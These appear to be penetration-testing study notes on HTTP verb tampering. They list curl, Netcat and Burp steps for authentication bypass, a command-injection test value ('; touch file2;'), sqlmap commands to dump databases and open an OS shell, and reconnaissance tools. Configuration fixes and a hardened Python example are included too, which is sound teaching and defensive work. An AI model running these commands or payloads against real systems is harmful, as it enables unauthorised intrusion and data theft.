1. HTTP Verb Tampering

1. Identifying Protected Pages (Basic Authentication Bypass)

Using curl to Check for Authentication Prompts

curl -i http://target.com/admin/reset.php
curl -i http://target.com/admin/

Using Burp Suite to Intercept and Examine Requests

  • Use Burp Suite Proxy to capture HTTP requests.

  • Inspect responses for authentication requirements.

2. Identifying Allowed HTTP Methods

Using curl to Send OPTIONS Request

curl -i -X OPTIONS http://target.com/admin/reset.php

Using Netcat to Check Allowed Methods

nc -nv target.com 80
OPTIONS / HTTP/1.1
Host: target.com

  • Finish the request with an empty line; the server does not answer until it sees one.

3. Exploiting Authentication Bypass

Using HEAD Method for Bypass

curl -I http://target.com/admin/reset.php

  • curl -I sends a real HEAD request; with -X HEAD curl still waits for a response body and hangs.

  • Manually change the HTTP method in Burp Suite.

Bypassing Security Filters by Changing HTTP Method

  • Modify requests from POST to GET or HEAD.

  • Use Burp Suite to modify request methods manually.

Testing Command Injection After Bypass

curl -X GET "http://target.com/page?filename=file1; touch file2;"

4. Insecure Web Server Configurations

Vulnerable Apache Configuration

<Limit GET>
    Require valid-user
</Limit>

  • Can be bypassed using HEAD or OPTIONS methods.

  • Fix: put the Require directive outside any <Limit> block (or use <LimitExcept>) so that every method is protected.

Vulnerable Tomcat Configuration

<http-method>GET</http-method>

  • A security-constraint that lists <http-method> elements covers only those methods; omitting them makes the constraint apply to all methods.

Vulnerable ASP.NET Configuration

<allow verbs="GET" roles="admin" />

  • The role check applies to GET only; requests using other verbs fall through to the remaining authorization rules.

5. Testing for SQL Injection with SQLmap

sqlmap -u "http://target.com/page?code=test" --dbs # Enumerate databases
sqlmap -u "http://target.com/page?code=test" --dump # Dump database content
sqlmap -u "http://target.com/page?code=test" --os-shell # Get OS shell

6. Fuzzing HTTP Methods

Using wfuzz

wfuzz -c -z file,verbs.txt -X FUZZ http://target.com/admin/reset.php

  • -X FUZZ substitutes each line of verbs.txt as the request method; placing FUZZ in the URL path would fuzz directories instead.

7. Web Scanning and Reconnaissance

Nmap (Port Scanning)

nmap -sV -sC target.com
nmap -p 80,443,8080 target.com

Nikto (Web Server Scanning)

nikto -h target.com

Gobuster (Directory Bruteforce)

gobuster dir -u target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

8. Burp Suite Tools Overview

  • Burp Intruder: Used for fuzzing, brute-forcing, and other automated attacks.

  • Burp Repeater: Used for manually crafting and replaying HTTP requests.

  • Burp Scanner: Used for automated vulnerability scanning.

9. HTTP Verb Tampering Overview

Common HTTP Verbs

  • HEAD: Retrieves headers only.

  • PUT: Replaces a resource.

  • DELETE: Removes a resource.

  • OPTIONS: Lists allowed methods.

  • PATCH: Partially modifies a resource.

Causes of Vulnerabilities

  • Insecure Web Server Configurations

  • Inconsistent Application Logic

  • Weak Input Validation

Example of Insecure Coding (PHP)

// The filter only checks the POST copy of "code" ...
if(preg_match($pattern, $_POST["code"])) {
    // ... but the query reads $_REQUEST, which merges GET, POST and cookie values.
    $query = "SELECT * FROM ports WHERE port_code LIKE '%" . $_REQUEST["code"] . "%'";
}

  • Filters $_POST but uses $_REQUEST, allowing SQL injection via GET requests.
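The inconsistency above, modelled in Python as an added example (not code from the original notes): a handler that validates only the POST body but queries the merged GET+POST parameters, beside a hardened handler that accepts one method, reads one source, validates that value and parameterizes the query. The allowlist pattern and the POST-wins merge order are assumptions standing in for the PHP application's $pattern and $_REQUEST.

```python
import re
import sqlite3

# Assumed allowlist, standing in for the application's $pattern.
PATTERN = re.compile(r"[A-Za-z0-9]+")


def request_params(query, form):
    """Model of PHP's $_REQUEST: GET and POST merged, POST winning on collisions."""
    merged = dict(query)
    merged.update(form)
    return merged


def vulnerable_handler(method, query, form):
    """Validates only the POST body, then builds SQL from the merged parameters."""
    if method == "POST" and not PATTERN.fullmatch(form.get("code", "")):
        return None  # request filtered
    code = request_params(query, form).get("code", "")
    # String concatenation, as in the PHP snippet: the value is never checked on GET.
    return "SELECT * FROM ports WHERE port_code LIKE '%" + code + "%'"


def hardened_handler(method, query, form):
    """Same rule for every verb: one accepted method, one parameter source, one check."""
    if method != "POST":
        return None  # would be a 405 in a real application
    code = form.get("code", "")
    if not PATTERN.fullmatch(code):
        return None
    # Bound parameter instead of concatenation; the wildcard stays in the data.
    return ("SELECT * FROM ports WHERE port_code LIKE ?", ("%" + code + "%",))


def lookup_ports(rows, method, query, form):
    """Runs the hardened query against a constructed in-memory ports table."""
    stmt = hardened_handler(method, query, form)
    if stmt is None:
        return []
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ports (port_code TEXT)")
    db.executemany("INSERT INTO ports VALUES (?)", [(r,) for r in rows])
    return [r[0] for r in db.execute(*stmt)]


if __name__ == "__main__":
    payload = {"code": "abc' OR 'x'='x"}
    print(vulnerable_handler("POST", {}, payload))   # None: filter works on POST
    print(vulnerable_handler("GET", payload, {}))    # payload reaches the SQL string
    print(hardened_handler("GET", payload, {}))      # None: verb change buys nothing
    print(lookup_ports(["CL", "CLA", "BR"], "POST", {}, {"code": "CL"}))
```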

10. Prevention Strategies

  • Apply consistent authentication rules across all HTTP methods.

  • Use strict input validation and sanitization.

  • Disable unnecessary HTTP methods.

  • Configure web servers to restrict HTTP methods properly.

  • Implement Content Security Policies (CSPs) and Web Application Firewalls (WAFs).

Key Takeaways

  • HTTP Verb Tampering can bypass authentication and security controls.

  • Testing HTTP methods is crucial for security assessments.

  • Web server configurations and application code must be securely implemented.

  • Regular security audits and penetration testing help mitigate risks.
